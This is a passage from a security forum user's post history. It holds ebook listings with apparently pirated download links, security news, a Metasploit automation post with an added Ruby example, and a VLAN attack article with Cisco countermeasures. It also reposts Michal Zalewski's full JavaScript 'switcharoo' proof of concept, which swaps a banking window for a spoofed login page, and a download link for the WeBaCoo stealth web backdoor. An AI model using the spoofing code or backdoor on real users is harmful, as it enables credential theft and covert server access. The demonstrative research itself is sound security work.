Everything posted by Nytro
-
[h=2]Mastering Algorithms with C[/h]
[h=3]Book Description[/h]
There are many books on data structures and algorithms, including some with useful libraries of C functions. Mastering Algorithms with C offers you a unique combination of theoretical background and working code. With robust solutions for everyday programming tasks, this book avoids the abstract style of most classic data structures and algorithms texts, but still provides all of the information you need to understand the purpose and use of common programming techniques. Implementations, as well as interesting, real-world examples of each data structure and algorithm, are included.

Using both a programming style and a writing style that are exceptionally clean, Kyle Loudon shows you how to use such essential data structures as lists, stacks, queues, sets, trees, heaps, priority queues, and graphs. He explains how to use algorithms for sorting, searching, numerical analysis, data compression, data encryption, common graph problems, and computational geometry. And he describes the relative efficiency of all implementations. The compression and encryption chapters not only give you working code for reasonably efficient solutions, they offer explanations of concepts in an approachable manner for people who never have had the time or expertise to study them in depth.

Anyone with a basic understanding of the C language can use this book. In order to provide maintainable and extendible code, an extra level of abstraction (such as pointers to functions) is used in examples where appropriate. Understanding that these techniques may be unfamiliar to some programmers, Loudon explains them clearly in the introductory chapters.

Contents include:
- Pointers
- Recursion
- Analysis of algorithms
- Data structures (lists, stacks, queues, sets, hash tables, trees, heaps, priority queues, graphs)
- Sorting and searching
- Numerical methods
- Data compression
- Data encryption
- Graph algorithms
- Geometric algorithms

Table of Contents
Part I: Preliminaries
- Chapter 1 Introduction
- Chapter 2 Pointer Manipulation
- Chapter 3 Recursion
- Chapter 4 Analysis of Algorithms
Part II: Data Structures
- Chapter 5 Linked Lists
- Chapter 6 Stacks and Queues
- Chapter 7 Sets
- Chapter 8 Hash Tables
- Chapter 9 Trees
- Chapter 10 Heaps and Priority Queues
- Chapter 11 Graphs
Part III: Algorithms
- Chapter 12 Sorting and Searching
- Chapter 13 Numerical Methods
- Chapter 14 Data Compression
- Chapter 15 Data Encryption
- Chapter 16 Graph Algorithms
- Chapter 17 Geometric Algorithms

[h=3]Book Details[/h]
Paperback: 560 pages
Publisher: O'Reilly Media (August 1999)
Language: English
ISBN-10: 1565924533
ISBN-13: 978-1565924536
File Size: 6.3 MiB

[h=3]E-Book[/h]
[FilePost] Oreilly.Mastering.Algorithms.with.C.Aug.1999.rar
[FileJungle] Oreilly.Mastering.Algorithms.with.C.Aug.1999.rar

[h=3]Paper Book[/h]
[Amazon] Mastering Algorithms with C

Source: Mastering Algorithms with C | Wow! eBook - Blog
-
[h=2]Pro HTML5 and CSS3 Design Patterns[/h]
[h=3]Book Description[/h]
Pro HTML5 and CSS3 Design Patterns is a reference book and a cookbook on how to style web pages using CSS3 and HTML5. It contains 350 ready-to-use patterns (CSS3 and HTML5 code snippets) that you can copy and paste into your code. Each pattern can be combined with other patterns to create an unlimited number of solutions, and each pattern works reliably in all major browsers without the need for browser hacks. The book is completely up-to-date with code, best practices, and browser compatibilities for HTML5 and CSS3—enabling you to dive in and make use of these new technologies in production environments.

Pro HTML5 and CSS3 Design Patterns is so much more than just a cookbook, though! It systematically covers every usable feature of CSS3 and combines these features with HTML5 to create reusable patterns. Each pattern has an intuitive name to make it easy to find, remember, and refer to. Accessibility and best practices are carefully engineered into each design pattern, example, and source code. The book's layout, with a pattern's example on the left page and its explanation on the right, makes it easy to find a pattern and study it without having to flip between pages. The book is also readable from cover to cover, with topics building carefully upon previous topics.

Pro HTML5 and CSS3 Design Patterns book unleashes your productivity and creativity in web design and development. Instead of hacking your way toward a solution, you'll learn how to predictably create successful designs every time by reusing and combining modular design patterns.

What you'll learn
- Code CSS3 and HTML5
- Use CSS3 Selectors
- Use six CSS3 Box Models
- Create rounded corners, shadows, gradients, sprites, and transparency
- Replace text with images without affecting accessibility
- Style text with fonts, highlights, decorations, and shadows
- Create flexible, fluid layouts
- Position elements with absolute pixel precision
- Stack elements in layers
- Size, stretch, shrinkwrap, indent, align, and offset elements
- Style tables with borders and alternating striped rows
- Size table columns automatically
- Integrate CSS3 and JavaScript without embedding JavaScript in HTML5
- Create drop caps, callouts, quotes, and alerts

Who this book is for
A software developer can use this book to learn CSS3 for the first time. A designer familiar with CSS3 can use this book to master CSS3 and HTML5. If you are completely new to coding or completely new to CSS3 and HTML5, you may want to read an introductory book on CSS3 and HTML5 first.

Table of Contents
- Design Patterns: Making CSS 3 Easy!
- HTML Design Patterns
- CSS Selectors and Inheritance
- Box Models
- Box Model Extents
- Box Model Properties
- Positioning Models
- Positioning: Indented, Offset, and Aligned
- Positioning: Advanced
- Styling Text
- Spacing Content
- Aligning Content
- Blocks
- Images
- Tables
- Table Column Layouts
- Layouts
- Dropcaps
- Callouts and Quotes
- Alerts

[h=3]Book Details[/h]
Paperback: 532 pages
Publisher: Apress (November 2011)
Language: English
ISBN-10: 1430237805
ISBN-13: 978-1430237808
File Size: 42.6 MiB

[h=3]E-Book[/h]
[FilePost] Apress.Pro.HTML5.and.CSS3.Design.Patterns.Nov.2011.rar
[FileJungle] Apress.Pro.HTML5.and.CSS3.Design.Patterns.Nov.2011.rar

[h=3]Paper Book[/h]
[Amazon] Pro HTML5 and CSS3 Design Patterns

Source: Pro HTML5 and CSS3 Design Patterns | Wow! eBook - Blog
-
WeBaCoo (Web Backdoor Cookie) 0.1.2
Authored by Anestis Bechtsoudis | Site github.com
Posted Dec 9, 2011

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server. WeBaCoo was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy mechanism to execute system commands on the compromised server. The obfuscated communication is accomplished using the HTTP header's Cookie fields in valid client HTTP requests and the corresponding web server responses.

Download: http://packetstormsecurity.org/files/download/107700/webacoo-0.1.2.tar.gz

Source: WeBaCoo (Web Backdoor Cookie) 0.1.2 | Packet Storm
-
[h=2]Free Tool Provides Point and Click SQL Injection Vulnerability Scanning[/h]
By Steve Ragan on December 10, 2011

NT OBJECTives, an application security vendor based in Irvine, California, has released a new tool that not only scans for SQL Injection vulnerabilities, but also exploits them with just a few extra clicks. The tool, NTO SQL Invader, works as a stand-alone tool, but when used in combination with NT OBJECTives' other products can take advantage of additional reporting abilities.

While not the only SQL Injection scanner / exploitation tool available, the interface is clean and easy to follow, which can offer IT teams and security auditors the ability to not only say there is a problem, but show solid proof as well.

"Accurate vulnerability identification is a crucial and challenging task but it is only half the battle," says Dan Kuykendall, co-CEO and CTO of NT OBJECTives. "We wanted to support organizations in their analysis and remediation efforts by providing an easy to use tool that enables penetration testers to demonstrate how these vulnerabilities can be exploited. We felt it was important to provide a free and useful tool to our customers and to the entire community."

While we can hype the tool and its ease of use all day long, it's better to see for yourself. NT OBJECTives has a quick three minute demo video showing the basics of the tool, which for most testers and security analysts highlights everything needed to get up and running.

Source: Free Tool Provides Point and Click SQL Injection Vulnerability Scanning | SecurityWeek.Com

NTO SQL Invader: http://rstcenter.com/forum/44578-nto-sql-invader.rst

Come on, script kiddies, "get to work"...
-
Enforcing Permanent DEP
Filed under: Shellcode — Didier Stevens @ 21:12

Here's a video of an exercise in my White Hat Shellcode Workshop I gave at Brucon in September.

Source: White Hat Shellcode Workshop: Enforcing Permanent DEP
-
[h=1]5 Hottest Security Jobs in 2012[/h]
Security Analyst, Architect Head Top Career Opportunities
December 9, 2011 - Upasana Gupta, Contributing Editor, CareersInfoSecurity

Information security is one of those rare fields - it has more job openings than people to fill them. Dice.com, the largest IT job site, confirms this job growth and indicates a 79 percent increase in the total number of information security jobs posted on the site from September 2009 to September 2011. Based on a review of job postings, here are the five hottest jobs for information security pros in 2012:

[h=3]Security Analyst[/h]
Employers have posted 42 percent more security analyst jobs on Dice in September 2011 than in 2010. This is no surprise, especially when employment among information security analysts soared by 16 percent this year during the second quarter, with the Bureau of Labor reporting no unemployment during the first two quarters of 2011 (see Infosec Joblessness Remains Steady, at 0%).

John Reed, executive director at Robert Half Technology, an IT staffing firm, attributes the high growth to organizations becoming more security aware in light of cyber crimes, and needing hands-on IT security folks to uncover new vulnerabilities in order to keep their environment secure. "These are individuals on the front lines of security, fighting the fight everyday, and as such are critical for organizations to have," he says.

BLS defines information security analysts as those who plan, implement, upgrade or monitor security measures for the protection of computer networks and information. Information security analysts may ensure appropriate security controls are in place that will safeguard digital files and vital electronic infrastructure, as well as respond to computer security breaches and viruses.

Average Salary: $84,000 for a security analyst position.
Who's Hiring: Demand is high with federal government, state agencies, defense contractors and healthcare organizations.

[h=3]Security Architect[/h]
Forty percent more jobs are posted on Dice this year. The move to mobile, wireless and cloud services by organizations has created a huge demand for this position, says Mano Paul, (ISC)2 software assurance adviser. These services are pushing the need for a "new breed of architects and business-savvy leaders who understand business requirements, and can translate them into functional specifications without compromising on the assurance aspects," he says.

Dice.com defines a security architect as a professional who designs systems, databases, infrastructure and networks to be secure. They provide information security solutions to the architecture of an enterprise, ensuring the security of business information at every point.

Average Salary: $120,000 for a security architect position.
Who's Hiring: Large financial institutions, healthcare organizations, technology companies and cloud providers.

[h=3]Application Security[/h]
Thirty-three percent more jobs are posted on Dice in application security this year. The increased focus on customer-facing technologies, use of mobile applications, need for secure software and products within organizations and transitions to electronic health records have led to the demand for these jobs. "High incidences of application attacks, data breaches and applications that are conduits to the data, combined with surge in tech businesses, is pushing growth for qualified professionals," Paul says.

The Open Web Application Security Project, a not-for-profit organization focused on improving the security of application software, defines application security professionals as those that use software and security methods to protect applications from external threats and vulnerabilities. They are largely involved in building security measures into an application's life cycle including design, development, deployment, upgrade or maintenance.

Average Salary: $93,000 for an application security position.
Who's Hiring: Online companies, technology firms, cloud providers and security vendors.

[h=3]Security Engineer[/h]
Employers have posted 27 percent more security engineer jobs on Dice this year. This field is hot because the role is broad and covers areas from penetration testing, vulnerability assessments, programming, designing systems to testing software. "It's not like a painting on the wall that you hang up and it's done. Organizations need constant assessment of their risk and vulnerabilities, and therefore require such breadth of expertise," Reed says.

BLS defines security engineers as those who securely design, develop, test and evaluate computer applications and system software. Although programmers write and support programs in new languages, much of the design, security and development are the responsibility of security engineers. They also focus on developing algorithms, and analyzing and solving programming problems for specific network systems.

Average Salary: $94,000 for a security engineer position.
Who's Hiring: This position is in demand in all sectors, including government, healthcare, finance, in addition to online and technology companies.

[h=3]Network Security[/h]
Twenty-five percent more jobs are posted on Dice within network security this year. Of the 100 jobs that make Money magazine's and Payscale.com's list, network security was ranked number eight last year as one of the most desirable job positions, carrying an annualized 10-year forecast growth of 27 percent. "Network security continues to be a pain point for companies," says Alice Hill, managing director of Dice.com. She finds that organizations continue to prioritize investing in these professionals to protect critical infrastructure and keep their technology platforms safe from ongoing cyber threats like malware and hacking.

Further, she says that the growing use of sophisticated computer networks, including Internet and intranet sites, and the need for faster, more efficient networking products, are increasing the demand for these professionals. BLS defines network security as those who design and evaluate network systems, such as local area networks, wide area networks and Internet systems. They perform network modeling, analysis, and planning that deals with the interfacing of computer and communications equipment. Their primary focus is on protecting the computer systems in the network from unwanted intrusions, misuse, access or modifications.

Average Salary: $93,000 for a network security engineer position.
Who's Hiring: An increased demand is coming from government agencies, healthcare organizations, consulting companies and defense contractors.

Editor's Note: Salaries cited in the story came from salary tracking websites Indeed.com and Payscale.com.

Source: 5 Hottest Security Jobs
-
Browser Security Comparison: A Quantitative Approach
Document Profile: Version 0.0, Published 12/6/2011

Contents
- Authors
- Executive Summary
  - Methodology Delta
  - Results
  - Conclusion
- Introduction
  - Analysis Targets
  - Analysis Environment
  - Analysis Goals
- Browser Architecture
  - Google Chrome
  - Internet Explorer
  - Mozilla Firefox
  - Summary
  - Browser Comparison
- Historical Vulnerability Statistics
  - Browser Comparison
  - Issues with Counting Vulnerabilities
  - Issues Surrounding Timeline Data
  - Issues Surrounding Severity
  - Issues Unique to Particular Vendors
  - Data Gathering Methodology
  - Update Frequencies
  - Publicly Known Vulnerabilities
  - Vulnerabilities by Severity
  - Time to Patch
- URL Blacklist Services
  - Comparing Blacklists
  - "Antivirus-via-HTTP"
  - Multi-Browser Defense
  - Comparing Blacklist Services
  - Comparison Methodology
  - Results Analysis
  - Conclusions
- Anti-exploitation Technologies
  - Address Space Layout Randomization (ASLR)
  - Data Execution Prevention (DEP)
  - Stack Cookies (/GS)
  - SafeSEH/SEHOP
  - Sandboxing
  - JIT Hardening
- Browser Anti-Exploitation Analysis
  - Browser Comparison
  - Google Chrome
  - Microsoft Internet Explorer
  - Mozilla Firefox
- Browser Add-Ons
  - Browser Comparison
  - Google Chrome
  - Internet Explorer
  - Firefox
  - Add-on summary
- Conclusions
- Bibliography
- Appendix A – Chrome Frame
  - Overview
  - Decomposition
  - Security Implications
  - Risk Mitigation Strategies
  - Conclusion
  - Bibliography
- Appendix B
  - Google Chrome
  - Internet Explorer
  - Mozilla Firefox
- Tools

Authors
Listed in alphabetical order:
- Joshua Drake (jdrake@accuvant.com)
- Paul Mehta (pmehta@accuvant.com)
- Charlie Miller (charlie.miller@accuvant.com)
- Shawn Moyer (smoyer@accuvant.com)
- Ryan Smith (rsmith@accuvant.com)
- Chris Valasek (cvalasek@accuvant.com)

Pages: 140
Download: http://www.accuvant.com/sites/default/files/AccuvantBrowserSecCompar_FINAL.pdf
-
OK, let's clear up the situation:

"I know someone who has something like... a POS stealer. It's a small virus that installs itself on POS terminals and saves everything that passes through the terminal... either to email or uploads it to an FTP. If anyone knows anything, please PM."

What I understand from this post is that you are interested in a POS stealer, which is not exactly ethical, and the forum rules forbid such crap here. We want the people here to be people passionate about IT security and programming, NOT about theft, carding and other crap. I don't want all kinds of people eager to steal banking data from POS terminals gathering here. The forum rules are quite clear on this point.

If you still have questions and don't agree with the ban, you can create another account and send me a PM from it. That is, unless you're the one who started swearing in the introductions section, in which case I don't think there's any point in bothering.

Edit: If you want to end up like this: http://packetstormsecurity.org/news/view/20311/Four-Romanians-Charged-With-Hacking-150-Subway-Shops.html that's your problem; we don't want to encourage such crap and we don't agree with it.
-
I've made a few more graphical changes. I've centered things a bit more. I'll take care of other things today and tomorrow.
-
As a note, ALL data passes through Yahoo!'s servers. I did a test with a file transfer and the file was also transmitted through a Yahoo! server, so you can't see the IP of the person you're talking to on Messenger.
-
[Tutorial] How to install and use FileZilla.
Nytro replied to PassaMan's topic in Tutoriale in romana
Yes, it really wouldn't have occurred to me to click Next during installation; I was thinking: "Dude, maybe I'll get viruses if I click Next." Seriously now, I don't think a tutorial on how to install and use an FTP client is needed. And more seriously, try to post interesting things; here in the Romanian tutorials section there's a pile of stinking crap, junk that won't help anyone get ahead and learn more. Anyway, it's no problem that you posted; on the contrary, it can be very useful to many people, but I think most people here know how to use an FTP client. It would be perfect if someone translated some tutorials from English...
-
Four Romanians Indicted for Hacking Subway, Other Retailers
Nytro replied to begood's topic in Stiri securitate
Good, off to prison with them.
-
OK, if you find more problems like this, post them. That goes for the others too. I'll fix what can be fixed. If there are other people who "lost" their accounts, do the same: old username and a link to a post from the old username + other details such as join date or whatever else.
-
User: LLegoLLaS
User: Petzy
User: BGS
User: wildchild
User: tromfil

I've "solved" the account problem (for those above). The data on the new accounts has been deleted. However, I don't guarantee you have all the data from before. In fact, I can say I don't guarantee for any user that they have all the data from before the problems. I've also updated the "post count" for all forum users. That's all for this evening; it would have been easier for me if you hadn't used the new accounts, so I wouldn't have had to delete the existing data (apart from posts). Tomorrow evening and over the weekend I'll fix other problems too, there are more...
-
[h=2]Six Ways to Automate Metasploit[/h]
Posted by HD Moore on Dec 8, 2011 10:44:35 AM

[h=3]Onward[/h]
Over the last few weeks the Metasploit team at Rapid7 has engaged in an overhaul of our development process. Our primary goals were to accelerate community collaboration and better define the scopes of our open source projects. The first step was to migrate all open source development to GitHub. This has resulted in a flood of contributors and lots of great new features and content.

One controversial change involved removing old, buggy automation tools that simply didn't meet the quality bar, or our scope for the framework. This resulted in the removal of file_autopwn and db_autopwn. Both of these modules were easy to use, but were more likely to fall over and crash than produce useful results. The db_autopwn code started off as a joke and never reached a point where it was actually stable. For anyone who really wants to use db_autopwn, a community contributor maintains it as a plugin in a GitHub fork.

The Metasploit products (including the open source Metasploit Framework) support automation at multiple levels. How you automate the product depends on what type of task you are working on and the granularity needed. The list below is not comprehensive; there are an infinite number of ways to extend, include, and automate Metasploit, but these are the best supported and most common methods.

[h=3]The Metasploit Console[/h]
Resource Scripts

The console (msfconsole or msfpro) supports basic automation using Resource Scripts. These scripts contain a set of console commands that are executed when the script loads. In addition to basic console commands, these scripts are also treated as ERB templates. ERB is a way to embed Ruby code directly into a document. This allows you to call APIs that are not exposed via console commands and even programmatically generate and return a list of commands based on your own logic.

Resource Scripts can be specified with the -r option to the Metasploit Console, and ~/.msf4/msfconsole.rc is automatically executed on startup if it exists. Resource Scripts can also be executed from the console prompt through the resource command.

Plugins

The console (msfconsole or msfpro) also supports the concept of Plugins. Plugins add new console commands that provide a utility or automation function. The flexibility of the Ruby language allows Plugins to do nearly anything, from exposing new automation capabilities, to providing socket-level content filtering to prevent the tripping of a remote IDS. Direct integration with Nexpose, Nessus, and OpenVAS from the console is accomplished through plugins. The full list of default plugins can be found in the GitHub repository. Plugins are the suggested way to work on new console commands and share them with the wider community.

[h=3]Auxiliary Module Custom Commands[/h]
Auxiliary modules are defined as any Metasploit module that performs a remote operation of some sort, but doesn't take an actual payload like an exploit. Auxiliary modules handle things like reconnaissance, authentication bypass, network sniffing, and vulnerability discovery. One little-used feature of Auxiliary modules is the ability to define new console commands from within the module context. The user would enter "use auxiliary/module/name" and if the module exposes new commands, these would become available to the console. One example is the TrendMicro ServerProtect File Access module.

[h=3]Custom Auxiliary Modules[/h]
Although we do not accept modules that run other modules into the Metasploit Framework proper, these are trivial to create as custom modules and allow for any form of automation, exposed through any supported user interface. The major advantage to writing automation tools as Auxiliary modules is that they will usually work just fine from Metasploit Community Edition or Metasploit Pro, as well as third-party interfaces like MSFGUI.

One example of an existing automation module in the framework (and one that is still being reviewed from a design perspective) is browser_autopwn. This module will automatically configure exploit modules and redirect the target to the appropriate one. The reason why this isn't really a good fit for the framework is that payload and target selection are hardcoded to values that may not always work. We are looking into better ways to handle client-side exploit automation, but until then, it serves as an in-tree example of Auxiliary module automation.

[h=3]Metasploit Remote API[/h]
The Metasploit Framework and Metasploit Pro both support automation using a documented Remote API. On the framework side, this exposes a wide range of functionality at the lowest level, allowing the caller to run modules, interact with sessions, and generally access the backend of the Metasploit instance. Metasploit Pro builds on this by offering access to the commercial product features through the same API. In fact, the Metasploit Pro user interface uses this same API to drive the backend automation. The product was built with automation and extensibility in mind.

Using Metasploit Pro with the Remote API makes it painless to remotely automate a penetration test, across multiple instances of Pro, all from a central location. Rapid7 customers are using this today to conduct automated exploitation during off-hour scan windows and to automate things like password testing across dozens of remote sites at once, with centralized reporting. You can find examples of the Pro API automation in the documentation directory of the framework. The msfrpc-client GEM is available for Ruby developers.

[h=3]Ruby Programming[/h]
At the end of the day, the Metasploit Framework is a development environment more than it is a standalone product. The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new. Each of the previous methods makes it easy to load custom Ruby code and leverage that code in a useful way; to get the most out of the Metasploit products, it helps to become familiar with the framework API itself. Nearly all of the framework code is available under an open source license and the latest changes can be found in the main GitHub repository. Metasploit Pro customers are encouraged to contact support (and likely, from there, the development team) about any ideas they have for development or integration. Nearly any code written for the Metasploit Framework is drop-in compatible with Metasploit Pro.

[h=3]Support[/h]
If you have any questions about automation, the Discussion forum in the Rapid7 Community is a great way to get started. For realtime discussion, the #metasploit channel on the FreeNode IRC network is a great resource as well.

Sursa: https://community.rapid7.com/community/metasploit/blog/2011/12/08/six-ways-to-automate-metasploit
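As an added example (not from the Rapid7 post and not Metasploit's own code), the stand-alone Ruby below emulates the ERB step the post describes for Resource Scripts: a host inventory drives a template that expands into plain console commands, which is what msfconsole does before executing a resource file line by line. The host addresses, log file path and template are constructed for illustration; spool, RHOSTS and auxiliary/scanner/ssh/ssh_version are existing console items.

```ruby
require 'erb'

# Constructed inventory (RFC 5737 documentation addresses, not from the post).
HOSTS = ['192.0.2.10', '192.0.2.11', '192.0.2.12'].freeze

# Resource script template. Lines outside the ERB tags are ordinary console
# commands, exactly as typed at the msf> prompt; the tags expand to one scan
# block per host. The console's resource loader skips blank lines and '#'
# comments, so the loop markers leave nothing behind once rendered.
RESOURCE_TEMPLATE = <<~RC
  # inventory_scan.rc - generated from the asset inventory, do not edit by hand
  spool <%= logfile %>
  <% hosts.each do |host| %>
  use auxiliary/scanner/ssh/ssh_version
  set RHOSTS <%= host %>
  run
  <% end %>
  spool off
RC

# Step 1 of what msfconsole does with a resource script: run it through ERB.
# `hosts` and `logfile` are the locals the template's embedded Ruby can see.
def render_resource_script(hosts, logfile)
  ERB.new(RESOURCE_TEMPLATE).result(binding)
end

# Step 2: every remaining non-blank, non-comment line is one console command,
# executed in order. This is the list the console would actually run.
def resource_commands(hosts, logfile)
  render_resource_script(hosts, logfile)
    .each_line
    .map(&:strip)
    .reject { |line| line.empty? || line.start_with?('#') }
end

if __FILE__ == $PROGRAM_NAME
  # Print the expanded command list; the rendered text itself could be saved
  # to a file and passed to `msfconsole -r`.
  puts resource_commands(HOSTS, '/tmp/ssh_audit.log')
end
```

In a real .rc file the same ERB tags work unchanged, with the inventory read inside a `<% %>` block instead of being passed in from Ruby.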
-
JavaScript Switcharoo Proof Of Concept
Authored by Michal Zalewski | Site lcamtuf.coredump.cx

It seems that relatively few people realize that holding a JavaScript handle to another window allows the attacker to tamper with the location and history objects at will, largely bypassing the usual SOP controls. With some minimal effort and the help of data: / javascript: URLs or precached pages, this can be leveraged to replace content in a manner that will likely escape even fairly attentive users.

/*
   Another whimsical browser proof-of-concept: http://lcamtuf.coredump.cx/switch/

   It seems that relatively few people realize that holding a JavaScript handle
   to another window (either because we opened it, or because the window was at
   some point displaying our content) allows the attacker to tamper with the
   location and history objects at will, largely bypassing the usual SOP
   controls. With some minimal effort and the help of data: / javascript: URLs
   or precached pages, this can be leveraged to replace content in a manner
   that will likely escape even fairly attentive users.

   /mz
*/

<script>

/* If you don't get it, beaver.coredump.cx is a trusted banking website;
   everything else is attacker-controlled. We begin by opening the legitimate,
   trusted website. Timing is essential. Once the banking website is loaded,
   follow the displayed security tip. */

var spaces = " " + " " + " " + " " + " " + " " + " " + " ";

var bank_html = "<title>Beaver Creek Online Banking and BBQ</title>" +
  "<h1>Beaver Creek Online Banking and BBQ</h1>" +
  "<p>" +
  "<font color=crimson>Security tip: please confirm that you see " +
  "<code>http://beaver.coredump.cx/</code> in the address bar!</font>" +
  "<p><table><tr>" +
  "<td>Login:</td><td><input type=text></td></tr><tr>" +
  "<td>Password:</td><td><input type=password></td></tr></table><p>" +
  "<input type=submit value='Log in!'>";

var w;

function dostuff() {

  /* Precache */
  if ('v' == '\v') {
    var x = new Image();
    x.src = 'http://spoofed.coredump.cx/phish/';
  }

  w = window.open('http://beaver.coredump.cx/beaver/', 'target');
  setTimeout(dostuff2, 5000);

}

function dostuff2() {

  if ('v' == '\v')
    w.open('http://spoofed.coredump.cx/phish/', 'target');
  else
    w.location.replace('data:text/html;np.cx/beaver/' + spaces + ',' + escape(bank_html));

}

</script>

<h3>The old switcharoo</h3>

This is hardly new, but illustrates the effectiveness of using data: or precached content to do the deed. You're probably fooling yourself if you think you'd spot this happening to you in the wild.

<p>
<input type=submit onclick="dostuff()" value="Do it">
<p>
<font color=gray>PS. If you don't get it, close the window and try again. If you're still stumped, view the source.</font>

Sursa: JavaScript Switcharoo Proof Of Concept ? Packet Storm
-
Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics)

Description: Welcome to Part 1 of the SecurityTube Metasploit Framework Expert (SMFE) course material videos. You can sign up for the course here: SecurityTube Metasploit Framework Expert Certification. In this video, we will look at the basics of vulnerability, how to use a raw one using the exploit source code and identify the problems with this approach. This will then lead to the need for a tool like Metasploit.

Securitytube Metasploit Framework Expert Part 2 (Why Metasploit?)

Description: This is Part 2 of the Security Metasploit Framework Expert (SMFE) course material. You can begin by watching Part 1 here: Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics). You can sign up for the course here: SecurityTube Metasploit Framework Expert Certification. In Part 2, we will look at how to use Metasploit to exploit vulnerabilities in the Dcom and Netapi services. We will also learn how to de-couple exploits and payloads, and mix and match them.

Securitytube Metasploit Framework Expert Part 3 (Meterpreter Basics)

Description: This is Part 2 of the Security Metasploit Framework Expert (SMFE) course material. You can begin by watching Part 1 here: Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics). You can sign up for the course here: SecurityTube Metasploit Framework Expert Certification. Enjoy! In this video, we will look at the basics of Meterpreter - how it uses reflective DLL injection to stay in-memory, communicates over encrypted channels, uses TLV for communication which allows for multi-channel communication, and a bunch of other things.

Sursa: Welcome to SecurityTube!
-
VLAN Hacking
December 8th, 2011 | By: Hari Krishnan

Introduction

A Virtual LAN or VLAN is a group of hosts that communicate with each other even though they are in different physical locations. Location independence for the users, bandwidth savings, easier device management and cost effectiveness for the organization are some of the facilities provided by a Virtual LAN. VLAN is based on Layer 2, the "Data link" layer of the OSI Model. The OSI layers are independent of each other and they communicate with each other. If any one of the layers gets compromised, the other layers also fail. The VLAN is on the Data Link layer, which is as vulnerable to attacks as any other layer of the OSI model.

Security Issues faced by a VLAN

When it comes to VLAN, it is best suited for traffic management and definitely not for security. Some of the security issues faced by VLAN are given below:
ARP Attack
MAC Flooding Attack
DHCP Attack
Spanning-Tree Protocol Attack
Multicast Brute Force Attack
Private VLAN Attack
VLAN Hopping Attack
Double-Encapsulated 802.1Q
Random Frame Stress Attack

ARP Attack

ARP is the Address Resolution Protocol, which was designed for a friendly environment. ARP works by associating the IP address of Layer 3 with the MAC address of Layer 2. ARP lacks very much when it comes to security: a malicious user is able to use a forged Layer 3 IP address and Layer 2 MAC address, and there is no way to verify those forged details in ARP. The malicious user identifies himself as a legitimate user and starts to use resources available on the network. It's even possible to transmit ARP packets to a device in a different VLAN using those forged details. It even allows the malicious user to perform a Man-in-the-middle (MiM) attack. A MiM attack is performed when a network device identifies itself as another network device such as the default gateway; there is no way to verify those credentials. Then the attacker starts to send ARP packets to the targeted victim, and those ARP packets cannot be verified by the receiver. The receiver's ARP table is filled with the forged details of the ARP packets sent by the attacker. The attacker is then able to gather all the information about the receiver and even tries to impersonate the receiver to other devices in the network. At the end of the attack, the attacker corrects the ARP tables and the network comes back to normal.

Tools which can be used for performing ARP spoofing are Arpspoof, Arpoison, Cain and Abel, Ettercap, and Trapper, which was inspired by the famous tool called Cain.

An effective countermeasure to ARP attacks is Dynamic ARP Inspection (DAI). DAI is a security feature which validates all the ARP packets in a network. It discards the ARP packets with invalid IP and MAC addresses.

To enable DAI on a VLAN (DHCP environment on Cisco):

Enter global configuration mode:
Router# configure terminal

Enable DAI on the VLAN by using ip arp inspection vlan {vlan_id | vlan_range} from global configuration mode:
Router(config)# ip arp inspection vlan {vlan_ID | vlan_range}

Finally, verify the configuration:
Router(config-if)# do show ip arp inspection vlan {vlan_ID | vlan_range} | begin Vlan

MAC Flooding Attack

A MAC flooding attack is one of the common attacks on a VLAN. In a MAC flooding attack, the switch is flooded with packets of different MAC addresses, therefore consuming memory on the switch. During the MAC flooding attack, the switch starts to behave like a "hub", where it starts to share the data with all the ports. Thus a malicious user is able to use a packet sniffer to extract sensitive data. For example, there are 3 workstations WA, WB and WC. When WA tries to send data to WB, it is not viewed by WC because of the switch. Now, a malicious user, consider WC, starts a MAC flooding attack on the switch with different MAC addresses, and the memory of the switch is filled. Now the switch starts to behave like a hub; thus the next time WA tries to send data to WB, it will be easily viewed by WC.

The best way to secure a VLAN from a MAC flooding attack is through Static Secure MAC addresses. They need to be manually configured using the command "switchport port-security mac-address mac-address interface". The other way to secure against MAC flooding is to limit the number of MAC addresses received by the port.

DHCP Attack

DHCP is the Dynamic Host Configuration Protocol, which enables a server to automatically assign an IP address to a host along with other information such as subnet mask and default gateway. There are two types of DHCP attack on a VLAN; they are the DHCP starvation attack and the DHCP rogue attack. In a DHCP starvation attack, a malicious user sends numerous DHCP requests with spoofed MAC addresses. This causes a Denial of Service at the DHCP server, thus not allowing an authentic user to use the network. It can be avoided by limiting the number of MAC addresses. In a DHCP rogue attack, a malicious user acts as if he is a DHCP server and provides a reliable user with the wrong gateway, wrong DNS and wrong IP. The user will experience numerous problems ranging from connection problems to communication problems with other hosts. This can be avoided by using a multilayer switch which has the capability to drop the packets. One of the tools which can be used for this kind of attack is Yersinia, which is a network tool designed to take advantage of some weaknesses in different network protocols. This can also be used for the spanning-tree protocol attack.

Spanning-Tree Protocol Attack

When a malicious user sends an STP message with a priority zero value, thus making a new root bridge and compromising the entire network, it is known as a Spanning-Tree Protocol attack. It can be avoided by disabling the spanning-tree function on all user interfaces. This can also be done by enabling root guard on Cisco equipment or BPDU guard on the user's port to disallow the priority zero value, so the malicious user won't be able to gain the root bridge.

To enable Root Guard on CatOS:
vega> (enable) set spantree guard root 1/1
Rootguard on port 1/1 is enabled.
Warning!! Enabling rootguard may result in a topology change.
vega> (enable)

To enable BPDU guard on CatOS:
Console> (enable) set spantree portfast bpdu-guard enable
Spantree portfast bpdu-guard enabled on this switch.
Console> (enable)

Multicast Brute Force Attack

The multicast brute force attack proceeds when a switch receives a number of multicast frames in rapid succession. This causes the frames to leak into other VLANs instead of being contained in the original VLAN. This might also cause a scenario similar to denial of service. The multicast brute force attack can be stopped by a well-equipped switch which prevents the frames from leaking into other VLANs and therefore contains them in the original VLAN.

Private VLAN Attack

A Private VLAN is a Layer 2 feature which is used to isolate the traffic only at Layer 2. When a Layer 3 device such as a router is connected to a Private VLAN, it is supposed to forward all the traffic received by the router to whatever destination it's meant for. Sometimes a malicious user might use this to his advantage. This can be prevented by configuring a VLAN access list.

To define a VLAN access map:
# vlan access-map map_name [0-65535]

To delete a map sequence from a VLAN access map:
